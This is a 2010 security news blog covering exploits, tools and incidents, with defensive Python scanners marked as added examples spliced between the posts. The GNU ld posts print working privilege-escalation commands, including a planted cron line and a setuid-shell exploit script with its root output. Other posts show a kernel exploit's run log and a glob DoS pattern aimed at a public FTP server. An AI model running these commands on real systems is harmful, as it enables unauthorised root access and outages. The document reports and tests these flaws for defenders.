Wednesday, October 27, 2010

Firefox 0day found on the Nobel Peace Prize website

A hidden iframe on nobelpeaceprize.org was exploiting a Firefox 0day vulnerability via an exploit pack.

According to Einar Oftedal, a detection executive at Norman ASA in Oslo, the official website for the Nobel Peace Prize, nobelpeaceprize.org, was compromised so that it contained an iframe link to a malicious server.
“This iframe has a multi exploit backend and serves exploits for Firefox, including a working remote exploit for firefox 3.6.11,” he said in an instant message to The Register. “We didn't see any 0day for IE,” he added, referring to Microsoft's browser.
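As an added example (this code is not from the post, from Norman or from The Register), a small Python scanner that flags iframes of the kind described above: zero-sized, hidden by inline CSS, or loading content from a host other than the page's own. The sample page and the malicious.invalid host name are constructed for the demonstration.

```python
"""Flag hidden or off-site iframes in an HTML page (added example, not from the post)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-style fragments that make a frame invisible to the visitor.
_HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*:\s*0(?:px)?\b",
    re.I,
)


class HiddenIframeFinder(HTMLParser):
    """Collect iframes that are zero-sized, hidden by CSS, or point to another host."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # list of (src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases attribute names
        reasons = []
        # 1. Zero (or one) pixel frames: width="0", height="1px", ...
        for dim in ("width", "height"):
            val = a.get(dim, "").strip().rstrip("px").strip()
            if val.isdigit() and int(val) <= 1:
                reasons.append(f"{dim}={val}")
        # 2. Hidden through the inline style attribute.
        if _HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-by-style")
        # 3. Frame content served from a host other than the page itself.
        src = a.get("src", "")
        host = urlparse(src).hostname
        if host and host.lower() != self.page_host:
            reasons.append(f"external-host={host.lower()}")
        if reasons:
            self.findings.append((src, reasons))


def find_hidden_iframes(html, page_host):
    """Return [(src, reasons)] for every suspicious iframe in html."""
    parser = HiddenIframeFinder(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: one legitimate same-site frame and one injected, invisible, off-site frame.
SAMPLE_HTML = """
<html><body>
<iframe src="http://www.example.org/video" width="640" height="480"></iframe>
<p>Announcement text</p>
<iframe src="http://malicious.invalid/x.php" width="0" height="0"
        style="display:none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, why in find_hidden_iframes(SAMPLE_HTML, "www.example.org"):
        print(f"suspicious iframe {src}: {', '.join(why)}")
```

Run it over saved copies of your own pages (for instance what a proxy logged) and alert on any external-host hit; note that the style heuristic only sees inline CSS, so a frame hidden by a stylesheet rule needs the rendered DOM instead.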


More information:
darknet
Information Security News mailing list

Tuesday, October 26, 2010

FUD in the IDS market

There has been a lot of FUD going on in the IDS/IPS market. Stonesoft has launched a campaign saying that their product is the only one able to stop some advanced attacks that are not public.

I am not an expert in the field, but there are two things that worry me:

  • Somebody saying that they can stop all the advanced attacks with "anti evasion techniques", but there are no details whatsoever.
  • None of the competitors is able to achieve the same results.
For me, it looks like nasty FUD trying to gain some market share in the short term, but history has demonstrated that this is a bad strategy.

Anyway, I always trust people who openly discuss the problems, like researchers and open source developers.


Some comments from SourceFire
Some lolz from Daily Dave mailing list

Monday, October 25, 2010

Nessus scan through a socks Meterpreter pivot

Great article from digininja.org that explains how to scan a target network with Nessus through a Meterpreter session.

It is achieved by setting up a pivot and using the auxiliary/server/socks4a module. Since the Nessus server does not natively support SOCKS, we have to use a wrapper like proxychains or socksify, as explained in the article.

Friday, October 22, 2010

GNU ld dlopen privilege escalation

For the second time this week, Tavis Ormandy has sent a 'bomb' to the Full Disclosure list, in the form of a Linux privilege escalation with GNU ld.

In a nutshell, the problem is the following:
LD_PRELOAD is:
A whitespace-separated list of additional, user-specified, ELF shared libraries to be loaded before all others. This can be used to selectively override functions in other shared libraries. For set-user-ID/set-group-ID ELF binaries, only libraries in the standard search directories that are also set- user-ID will be loaded.
But this is not the case with LD_AUDIT. Basically, you can load any library when executing a suid program, and it will be executed with root permissions! The attack consists in finding an arbitrary library that writes a file to disk; when it runs inside a suid program, that file will be owned by root.


The final trick is that the newly created process inherits the parent's umask. What does this mean? We can change the umask in our shell and then create a world-writable file with root rights!

A regular user being able to write files with root permissions is a really bad thing... It means that you can create an arbitrary shell script that will be executed by cron with root rights. Yes, an instant root shell on the system!

The attack:

$ umask 0
#arbitrary suid program
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
# This library writes a file to disk when the PCPROFILE_OUTPUT
# environment variable is defined.
# There is another example with the liblftp-tasks library and
# the LFTP_HOME environment variable.
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > \
/etc/cron.d/exploit
# Create an arbitrary but valid crontab(5) line in the file and wait for the execution
# This attack creates a suid shell named /tmp/exploit.
$ /tmp/exploit
# whoami
root

UPDATE: Using crontab files is not an option because cron does not accept files that are group or world writable. The attacker must look for other options.

UPDATE: It is possible to upload an arbitrary library that will be loaded with root privileges, dropping a root shell.
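Since the payoff of this bug is a root-owned, world-writable file in a cron directory, the defender's check is to audit those directories. The following Python script is an added example, not part of Tavis Ormandy's post or of the exploit above: it flags cron.d entries that are group/world writable, not owned by root, or that run suspicious commands as root. The planted crontab line above is reused as constructed test input, and the SUSPICIOUS_CMD heuristics are my own assumptions.

```python
"""Audit a cron.d-style directory for entries a local user could have planted (added example)."""
import os
import re
import stat

# Command fragments that a root cron job should not normally contain (assumed heuristics).
SUSPICIOUS_CMD = re.compile(
    r"/tmp/|/dev/shm/|/var/tmp/|chmod\s+(?:[ugoa]*\+s|[4267]755)\b|cp\s+/bin/(?:ba|da)?sh\b"
)


def check_cron_entry(mode, uid, text):
    """Return findings for one crontab file given its st_mode, st_uid and content."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        # cron ignores such files, but a root-owned writable file is itself a sign of the LD_AUDIT trick.
        findings.append("group/world writable")
    if uid != 0:
        findings.append(f"owned by uid {uid}, not root")
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        fields = line.split(None, 6)  # minute hour dom month dow user command
        if len(fields) < 7:
            findings.append(f"line {lineno}: malformed entry")
            continue
        user, command = fields[5], fields[6]
        if user == "root" and SUSPICIOUS_CMD.search(command):
            findings.append(f"line {lineno}: root runs suspicious command: {command}")
    return findings


def audit_cron_dir(path="/etc/cron.d"):
    """Map file name -> findings for every entry in path that has any."""
    results = {}
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        st = os.lstat(full)
        if not stat.S_ISREG(st.st_mode):
            results[name] = ["not a regular file (symlink or directory)"]
            continue
        with open(full, errors="replace") as fh:
            text = fh.read()
        found = check_cron_entry(st.st_mode, st.st_uid, text)
        if found:
            results[name] = found
    return results


# Constructed inputs: the planted line from the post, and a normal packaged job.
PLANTED = "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n"
PACKAGED = "# sysstat\nMAILTO=root\n5 * * * * root /usr/lib/sysstat/sa1 1 1\n"

if __name__ == "__main__":
    print(check_cron_entry(0o100666, 0, PLANTED))
    print(check_cron_entry(0o100644, 0, PACKAGED))
    if os.path.isdir("/etc/cron.d"):
        print(audit_cron_dir("/etc/cron.d"))
```

The same check can be pointed at /etc/cron.hourly and friends; there the "command" heuristic does not apply (those are scripts, not crontab lines), but the ownership and mode checks still do.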

Thursday, October 21, 2010

Integrating Hydra with Nessus

Nice video from Paul Asadoorian on the Tenable Security blog.

The blog post discusses how to integrate Hydra with Nessus to run brute force attacks against your infrastructure: installing Hydra and configuring Nessus.

The post also points to several good resources for building the list of users and passwords that will be used in the brute force attack.

Malware Pushers Abuse Firefox Warning Page

Nice post from Darknet that discusses a new technique used by attackers to trick users into installing scareware.

I quote,

Hackers have subverted warnings generated by Firefox about dangerous sites to punt fake anti-virus portals.
Surfers straying onto a web page offering the “Security Tool” rogue anti-virus are offered a warning page that convincingly mimics the genuine Firefox block page. The site offers supposed updates for Mozilla’s technology that are actually scareware packages.
If Windows users apply these updates they will be falsely warned that their system is infected and continuously nagged into buying worthless scareware packages that serve only to line the pockets of cyber-scammers.
The rogue application will automatically attempt to install itself on the machines of prospective marks in cases where scripts are enabled, net security firm F-Secure warns.
Definitely, it is a really clever social engineering attack that tricks users into thinking they just got infected and have to install this new antivirus, which is already alerting about infections.

Persistence Registry keys and Windows Incident Response

The SANS Computer Forensics blog discusses how to query certain registry keys to find secondary indicators of a compromise.

Dave Hull has created a list of registry keys that can be used to run malware at boot time. He used AutoRuns from Microsoft Sysinternals to pull the list of registry keys.

The lists of keys are available here:


XPSP3_HKCU_Startup_Locations.txt - cannot be remotely queried
XPSP3_HKLM_Startup_Locations.txt - can be remotely queried

Privilege escalation in the Linux kernel

The H Security has reported on the second privilege escalation in Linux this week (the first is an error in the ld linker), CVE-2010-3904.

They point to the advisory as well as the PoC.

On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write arbitrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root. 


I have tested it in an old Ubuntu 10.10 RC VMware image and it worked.
Ubuntu's advisory was published on October 19th.


msk@ubuntu:~$ gcc -o test linux-rds-exploit.c
msk@ubuntu:~$ ./test
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved rds_proto_ops to 0xe09d6a40
 [+] Resolved rds_ioctl to 0xe09d0000
 [+] Resolved commit_creds to 0xc016c340
 [+] Resolved prepare_kernel_cred to 0xc016c790
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)


I have checked the advisory published by Red Hat and it seems that RHEL is not affected (RHEL 3 and 4 for sure), or I did not manage to make it work.

Debian seems to have a vulnerable kernel only in unstable (squeeze) and sid. The advisory marks all the versions as vulnerable, but this should be false because stable and backports do not support RDS.
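An added example (not from the VSR advisory, the exploit, or any distribution advisory): a Python helper that classifies a host's exposure from three inputs you can collect offline, uname -r, /proc/modules and the contents of /etc/modprobe.d. The lower bound 2.6.30 is taken from the exploit banner above; whether a given kernel in that range is patched still has to be checked against the vendor advisory. The sample /proc/modules lines are constructed, and an `install rds /bin/true` line in modprobe.d is the form treated as disabling the module.

```python
"""Classify a host's exposure to the RDS issue from offline inputs (added example, not from the post)."""
import re

AFFECTED_FROM = (2, 6, 30)  # lower bound from the exploit banner; patched kernels need the vendor advisory


def kernel_version(release):
    """'2.6.35-22-generic' -> (2, 6, 35); distro suffixes are ignored."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unparseable release string: {release!r}")
    return tuple(int(x or 0) for x in m.groups())


def rds_loaded(proc_modules_text):
    """True if the rds module is listed in /proc/modules content."""
    return any(line.split()[0] == "rds" for line in proc_modules_text.splitlines() if line.strip())


def rds_disabled(modprobe_text):
    """True if a modprobe.d line of the form 'install rds /bin/true' is present (blocks module loads)."""
    for line in modprobe_text.splitlines():
        words = line.split("#", 1)[0].split()
        if words[:2] == ["install", "rds"]:
            return True
    return False


def rds_exposure(release, proc_modules_text, modprobe_text):
    """One of: below-affected-range, rds-loaded, rds-disabled, rds-not-loaded-but-autoloadable."""
    if kernel_version(release) < AFFECTED_FROM:
        return "below-affected-range"
    if rds_loaded(proc_modules_text):
        return "rds-loaded"
    if rds_disabled(modprobe_text):
        return "rds-disabled"
    # An unprivileged socket(PF_RDS) call makes the kernel autoload the module, so "not loaded" is not safe.
    return "rds-not-loaded-but-autoloadable"


# Constructed sample inputs.
SAMPLE_MODULES = "rds 116288 0 - Live 0xf8b4c000\nusb_storage 47296 0 - Live 0xf8a12000\n"
SAMPLE_MODPROBE = "# disable RDS until the kernel is patched\ninstall rds /bin/true\n"

if __name__ == "__main__":
    import os
    import platform
    modules = open("/proc/modules").read() if os.path.exists("/proc/modules") else ""
    conf = ""
    names = sorted(os.listdir("/etc/modprobe.d")) if os.path.isdir("/etc/modprobe.d") else []
    for name in names:
        conf += open(os.path.join("/etc/modprobe.d", name), errors="replace").read()
    print(rds_exposure(platform.release(), modules, conf))
```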

Wednesday, October 20, 2010

Honeypot for vulnerable web applications

The Honeynet Project informs that GlastopfNG has been released. GlastopfNG is a honeypot that simulates vulnerable web servers/applications to fully understand the attacks.

GlastopfNG is a honeypot specialized on simulating a vulnerable web server/application to become a target of automated and even manual attacks. Instead of trying to block these attacks GlastopfNG tries to get as much information as possible about the attacker and the used attack itself. This gathered information can then be used in different ways to protect real applications in the future against such attacks. Today it's for example already used by hosting providers to inform owners of servers, which are attacking other servers on the Internet, that it's very likely, that their server has been hacked. This is a great additional service for their customers and can be done in a mainly automated way.

More information available in the paper.
It can be downloaded from here.

Presentation about botnets in SIGINT'10, Koln

SIGINT'10 took place between the 22nd and the 24th of May in Koln, Germany. The videos are also available, hosted by the CCC.

I just saw the presentation by Thorsten Holz called 'Botnets in 2010 - Status Quo and Future Threats'.

As a quick summary, it gives a quick introduction to botnets and their architecture and then talks about Storm Worm and Waledac.

Storm Worm
  • Not centralized C&C thanks to p2p
  • Fast flux domains
  • Uses infected computers with public IP addresses to proxy the content back to the backend: spam pages or pages with exploit packs. It is hard to track and offers high availability.
  • The NATed machines are used to send spam and DoS attacks.
  • Template based spamming. The template is sent to the bots, which then send the spam.
  • Mitigation: join the network and disrupt the communication channel between the bots (Stormfucker at 25C3)
Waledac
  • Successor of Storm Worm and perhaps created by the same group
  • Uses HTTP to tunnel traffic (major change) between the NATed machines and the repeaters
  • Multi-tier architecture ('hybrid' p2p), like Storm Worm
  • Static backend servers that host the content
  • Fast flux domains for C&C
  • Template based spamming.
  • The mitigation effort was called 'Operation b49' and took down the botnet in February 2010.



The video can be found here.

Tuesday, October 19, 2010

Java being massively exploited

Yes, Adobe is not the only one being targeted on Windows platforms, even though they are making things easy for the black hats :D

As Brian Krebs says, Microsoft is warning about attacks against Java with vulnerabilities that date back to 2008 (I have investigated attacks that used vulnerabilities patched back in 2006 and they continue to be very effective)!

CVE-2008-5353 - 1,196,480 computers infected.
CVE-2009-3867 - 1,119,191 computers infected
CVE-2010-0094 -   173,123 computers infected.

Microsoft says that it kind of makes sense because Java is widely installed and nobody thinks of updating it, like Adobe Acrobat. So it is a nice candidate to be added to exploit packs and get a nice infection rate ;)

GNU ld privilege escalation

Following this post in the Full Disclosure list, I learned about the privilege escalation in the GNU ld linker.

Somehow, it seems to be Red Hat centric, or I didn't manage to make it work in Debian/Ubuntu.

This is the exploit being executed on an up-to-date CentOS 5.5:

bash-3.2$ ls
exploit  payload.c  test.sh
bash-3.2$ cat test.sh
rm -rf /tmp/exploit
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

bash-3.2$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=root:system_r:unconfined_t:SystemLow-SystemHigh
bash-3.2$ sh test.sh
[root@localhost tmp]# cat /etc/redhat-release
CentOS release 5.5 (Final)
[root@localhost tmp]# id
uid=0(root) gid=99(nobody) groups=99(nobody) context=root:system_r:unconfined_t:SystemLow-SystemHigh
[root@localhost tmp]#

It does not seem to work in Ubuntu 10.10:

msk@ubuntu:/tmp$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=0
kernel.yama.protected_sticky_symlinks = 0
msk@ubuntu:/tmp$ sudo sysctl -w kernel.yama.protected_nonaccess_hardlinks=0
kernel.yama.protected_nonaccess_hardlinks = 0
msk@ubuntu:/tmp$ sh test.sh
Inconsistency detected by ld.so: dl-open.c: 232: dl_open_worker: Assertion `(call_map)->l_name[0] == '\0'' failed!
msk@ubuntu:/tmp$




Resources for Building Incident Response Teams

Richard Bejtlich posts some resources for building an Incident Response Team.

New version of Metasploit Unleashed

The guys at Offensive Security have updated their online course, Metasploit Unleashed.

You can find more information in their blog post.

Friday, October 15, 2010

Windows hardening: EMET

EMET (Microsoft's Enhanced Mitigation Experience Toolkit) is a tool that enables security features that are not enabled by default for applications. Unfortunately, Windows lets each application choose which security features should be enabled, by setting specific flags, so many attacks can succeed even though the security protections are enabled in the operating system.

In a nutshell, EMET is a DLL that enables the security features at runtime for applications that were compiled without them, like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization).

You can find more information about this tool as well as examples in this article from H Security.
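Added example, not from the H Security article and not part of EMET: the flags EMET compensates for are the DllCharacteristics bits a linker sets when an application opts into DEP (NX_COMPAT, 0x0100) and ASLR (DYNAMIC_BASE, 0x0040). This Python script reads those bits straight from a PE header, which lets you inventory which binaries on a box would benefit from EMET's runtime enforcement. build_sample_pe() constructs a minimal, non-loadable header just to exercise the parser.

```python
"""Read the DEP/ASLR opt-in bits from a PE header (added example, not from the article or EMET)."""
import struct
import sys

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # linker /DYNAMICBASE: ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # linker /NXCOMPAT: DEP opt-in


def pe_mitigations(data):
    """Return {'pe32plus', 'aslr', 'dep'} for the PE image in data (bytes)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    if size_of_optional < 72:
        raise ValueError("optional header too short to hold DllCharacteristics")
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    # DllCharacteristics sits at offset 70 of the optional header for both PE32 (0x10b) and PE32+ (0x20b).
    dll_characteristics = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "pe32plus": magic == 0x20B,
        "aslr": bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }


def build_sample_pe(dll_characteristics, pe32plus=False):
    """Constructed minimal header (not loadable) that exercises pe_mitigations()."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE signature right after the DOS header
    opt_size = 240 if pe32plus else 224
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def needs_emet(path):
    """True when the file does not opt into both DEP and ASLR, i.e. a candidate for EMET enforcement."""
    with open(path, "rb") as fh:
        m = pe_mitigations(fh.read())
    return not (m["aslr"] and m["dep"])


if __name__ == "__main__":
    for name, flags in {"both": 0x0140, "none": 0x0000}.items():
        print(name, pe_mitigations(build_sample_pe(flags)))
    for path in sys.argv[1:]:
        print(path, "needs EMET" if needs_emet(path) else "opted in to DEP+ASLR")
```

Pass real .exe/.dll paths on the command line to check them; DEP can still be forced system-wide by the OS policy, so the NX_COMPAT bit tells you what the binary asked for, not necessarily what it gets.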



Tshark Fu: decrypting SSL streams

Nice article from PaulDotCom about decrypting SSL streams with tshark, focused on HTTPS servers.

The article is easy to follow and explains the full process as well as the problems they found. The following points were particularly interesting:

Convert the private key from PKCS#8 to PKCS#1
I understand that the private key must be in PKCS#1 because it is the only format understood by tshark.

openssl pkcs8 -in private.key -out rsaprivate.key -nocrypt

This point is particularly confusing... I found the following entry in the Wireshark mailing list that explains this problem.


Tshark output and the HTTP parser

The following command decrypts the stream and parses the output with tshark's internal HTTP parser:

tshark -o "ssl.desegment_ssl_records: TRUE"  \
-o "ssl.desegment_ssl_application_data: TRUE" \
-o "ssl.keys_list:,443,http,rsa_private.key"  \
-o "ssl.debug_file:rsa_private.log" -r all.pcap  \
 -R "(tcp.port eq 443)" -V


This behavior can be changed if we want to read the raw data. This is achieved by modifying the protocol field in the third parameter, so that it reads data instead of http:

-o "ssl.keys_list:,443,data,rsa_private.key"


Thursday, October 14, 2010

Evercookies: evil user tracking

Many web browsers allow users to delete cookies, and this makes tracking a user's behavior more difficult. But an evil mind thought that using other storage areas that are not meant for storing cookies could bypass these control mechanisms.

An evercookie is defined as:
Evercookie is a javascript API available that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others. 
evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available on the local browser. Additionally, if evercookie has found the user has removed any of the types of cookies in question, it recreates them using each mechanism available.


Jeremiah Grossman points in his article to an evercookie demo and to the attempts made by Dominic White to defeat this tracking system. Dominic comments that Firefox should be safe by default (?) but Safari is not, and he created a shell script that deletes the temporary files.

Apparently, Jeremiah found a way to remove these cookies in Google Chrome using only the GUI. It is achieved by disabling the Silverlight and Flash storage settings.

Security websites attacked and public disclosure

Yes, gangs do not like their dirty laundry being made public because they want to keep working anonymously and, of course, they tend to go mad when somebody researches their activities and practices public disclosure.

On September 23rd, Brian Krebs published a story called 'I'll Take Two MasterCards and a Visa, Please' that appeared on mainstream websites and led to the takedown of the gang's website, which was used as a marketplace to sell stolen credit cards.

24 hours later, his website suffered a DoS attack with an average of 2.3 Gb, and at least one IP address that belongs to Microsoft was involved. As Krebs comments in his article Pill Gang Used Microsoft's Network in Attack on KrebsOnSecurity.com, it turns out that many computers in Microsoft's netblock had been compromised for weeks and were used to route traffic for pharmacy spam sites that belong to Russian gangs.

I found this paragraph particularly funny and ironic,
In just one of the many ironies in this story, the compromised server inside of Microsoft appears to have been running Linux, not one of Microsoft’s server technologies. According to Guilmette, all of the hacked servers used by this pill gang are Unix or Linux servers. This mode of operation matches that of “Bulker.biz,” a rogue pharmacy affiliate program known for promoting rogue “Canadian Health&Care Mall” pill sites — as well as a number of other brands — by hijacking poorly-secured Linux and Unix servers.

And the answer from Microsoft,
Microsoft became aware of reports on Tuesday, October 12, 2010, of a device on the Microsoft network that was possibly compromised and facilitating spam attacks. Upon hearing these reports, we immediately launched an investigation. We have completed our investigation and found that two misconfigured network hardware devices in a testing lab were compromised due to human error. Those devices have been removed and we can confirm that no customer data was compromised and no production systems were affected. We are taking steps to better ensure that testing lab hardware devices that are Internet accessible are configured with proper security controls.

Tuesday, October 12, 2010

A packet repository at the University of Twente

I have read on Richard Bejtlich's Twitter and on the Argus mailing list about the packet repository maintained by the University of Twente.

A quote from the wiki page,
From this location you can download anonymized packet headers (tcpdump/libcap), Netflow version 5 data and a Labeled Dataset for Intrusion Detection. Data is taken from various locations in the Netherlands. More information on the data collection and anonymization procedures can be found here.

Quick introduction to malware analysis

This post from Lenny Zeltser on the SANS Forensics Blog introduces the whole process of malware analysis.

The post can be summarized with the following points:

  • Behavioral analysis (dynamic analysis). Helps to understand how the malware interacts with the local and remote systems by running it in a controlled environment.
  • Code analysis (static analysis). Decompile the binary and analyze the malware at the assembler level with the help of a debugger.
  • Memory analysis. This method is related to behavioral analysis because the investigator dumps the contents of memory for further examination. This helps to spot hidden code as well as to better understand how the malware behaves.

I would also add network analysis because it helps to understand how the local system interacts with remote systems, like a C&C server. Many times the investigator must examine malware that was found on a live system, and having a network capture may be handy.


Metasploit megaprimer: 300 minutes of video tutorials

Awesome post on ethicalhacker.net with more than 300 minutes of video tutorials. I point to the original resources instead of using the URL shortening service that appears in the post.

1. Metasploit Megaprimer (Exploitation Basics and need for Metasploit) Part 1

http://securitytube.net/Metasploit-Megaprimer-(Exploitation-Basics-and-need-for-Metasploit)-Part-1-video.aspx

2. Metasploit Megaprimer (Getting Started with Metasploit) Part 2

http://securitytube.net/Metasploit-Megaprimer-(Getting-Started-with-Metasploit)-Part-2-video.aspx

3. Metasploit Megaprimer Part 3 (Meterpreter Basics and using Stdapi)

http://securitytube.net/Metasploit-Megaprimer-Part-3-(Meterpreter-Basics-and-using-Stdapi)-video.aspx

4. Metasploit Megaprimer Part 4 (Meterpreter Extensions Stdapi and Priv)

http://securitytube.net/Metasploit-Megaprimer-Part-4-(Meterpreter-Extensions-Stdapi-and-Priv)-video.aspx

5. Metasploit Megaprimer Part 5 (Understanding Windows Tokens and Meterpreter Incognito)

http://securitytube.net/Metasploit-Megaprimer-Part-5-(Understanding-Windows-Tokens-and-Meterpreter-Incognito)-video.aspx

6. Metasploit Megaprimer Part 6 (Espia and Sniffer Extensions with Meterpreter Scripts)

http://securitytube.net/Metasploit-Megaprimer-Part-6-(Espia-and-Sniffer-Extensions-with-Meterpreter-Scripts)-video.aspx

7. Metasploit Megaprimer Part 7 (Metasploit Database Integration and Automating Exploitation)

http://securitytube.net/Metasploit-Megaprimer-Part-6-(Espia-and-Sniffer-Extensions-with-Meterpreter-Scripts)-video.aspx

8. Metasploit Megaprimer Part 8 (Post Exploitation Kung Fu)

http://securitytube.net/Metasploit-Megaprimer-Part-8-(Post-Exploitation-Kung-Fu)-video.aspx

9. Metasploit Megaprimer Part 9 (Post Exploitation Privilege Escalation)

http://securitytube.net/Metasploit-Megaprimer-Part-9-(Post-Exploitation-Privilege-Escalation)-video.aspx

10. Metasploit Megaprimer Part 10 (Post Exploitation Log Deletion and AV Killing)

http://securitytube.net/Metasploit-Megaprimer-Part-10-(Post-Exploitation-Log-Deletion-and-AV-Killing)-video.aspx

11. Metasploit Megaprimer (Post Exploitation and Stealing Data) Part 11

http://securitytube.net/Metasploit-Megaprimer-(Post-Exploitation-and-Stealing-Data)-Part-11-video.aspx

12. Metasploit Megaprimer Part 12 (Post Exploitation Backdoors and Rootkits)

http://securitytube.net/Metasploit-Megaprimer-Part-12-(Post-Exploitation-Backdoors-and-Rootkits)-video.aspx

13. Metasploit Megaprimer Part 13 (Post Exploitation Pivoting and Port Forwarding)

http://securitytube.net/Metasploit-Megaprimer-Part-13-(Post-Exploitation-Pivoting-and-Port-Forwarding)-video.aspx

14. Metasploit Megaprimer Part 14 (Backdooring Executables)

http://securitytube.net/Metasploit-Megaprimer-Part-14-(Backdooring-Executables)-video.aspx

15. Metasploit Megaprimer Part 15 (Auxiliary Modules)

http://securitytube.net/Metasploit-Megaprimer-Part-15-(Auxiliary-Modules)-video.aspx

16. Metasploit Megaprimer Part 16 (Pass the Hash Attack)

http://securitytube.net/Metasploit-Megaprimer-Part-16-(Pass-the-Hash-Attack)-video.aspx

Monday, October 11, 2010

Real time Google Hacking

Probably everybody knows that Google restricts searches to prevent people from launching automated searches and finding sensitive data. The interesting part is that the Google services do not have this restriction, so you could crawl their database to find many dorks. :)

The guys at PaulDotCom comment on this behavior on their blog. Rob Ragan and Francis Brown (the Bing/Google Hackers at Defcon) have done some research on search engine hacking with amazing results. I quote the article,

They took the entire Google Hacking Database, Foundstone Hacking Database and their new BING Hacking Database and turned them into Google READER RSS feeds. As soon as Google or BING indexes a new site that matches your "intitle:Index Of passwords" criteria Google reader adds it to your RSS feed. (Your Google reader is able to get BING results by leveraging BING's &format=rss parameter) As a result, Google and BING are constantly searching for all the Googledorks in the database and maintaining a realtime database of the results! Then Rob and Francis exported their RSS feeds to OPML format so you can just import them into your own Google reader account.

You can find the project website here.

Friday, October 8, 2010

Adobe to add a sandbox in Adobe Reader

Darknet points to the sandbox that is being implemented in Adobe Reader and will be available in the next major release.

There is no doubt that this software is the most targeted Windows software nowadays. As Brian Krebs said, the last patch cycle had 23 patches!

Reading the implementation details in Darknet's post:
The new Reader design will see core and risky PDF functions such as font rendering, Javascript execution, 3D rendering and image parsing happen within the confines of the application itself, isolating these from the privileges of the operating system.
This effectively relegates Reader to a new rung of privilege below that if the system user, which stops the application simply accessing key parts of the OS such as the Registry or file system as it likes. Instead all such calls will have to go through a trusted broker process if they want to communicate beyond the sandbox.

Flaw in glob function implementation put FTP servers at risk

The H Security reports a DoS vulnerability that affects many FTP servers. These servers rely on a flawed implementation of the glob function that is vulnerable to a resource exhaustion attack.

Quoting H Security,

The problem exists because GLOB_LIMIT, a feature added in 2001 to limit the amount of memory used by the glob() function is ineffective. Globbing, as it is called, calls on the glob() function to match wildcard patterns when generating a list of matching file names. Because GLOB_LIMIT is not effective, it potentially allows a system's main memory to be flooded when processing certain patterns and this may, depending on the hardware used, cause the system to become very slow, cease to respond or even crash as a result.

Maksymilian Arciemowicz, the researcher who published the advisory (also published on exploit-db.com), reported that the main BSD operating systems are affected (OpenBSD, NetBSD, FreeBSD and Solaris), as well as GNU libc.

The advisory confirms that the vulnerability is easily exploitable:


GLOB_LIMIT
protect us before attacks like
*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
because glob will find more patches as in GLOB_LIMIT declared. Anyway, if
we use path what do not exists (with */.. strings) like
*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*blablahaha
GLOB_LIMIT will be never overflowed. Many combinations of paths, will
execute this proces a long time. We can also try allocate
(GLOB_LIMIT-1)*MAXPATHNAMELEN bytes per one process. ~200~300MB
Example:
> telnet ftp.netbsd.org 21
Trying 204.152.190.15...
Connected to ftp.netbsd.org.
Escape character is '^]'.
220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20100320) ready.
user anonymous
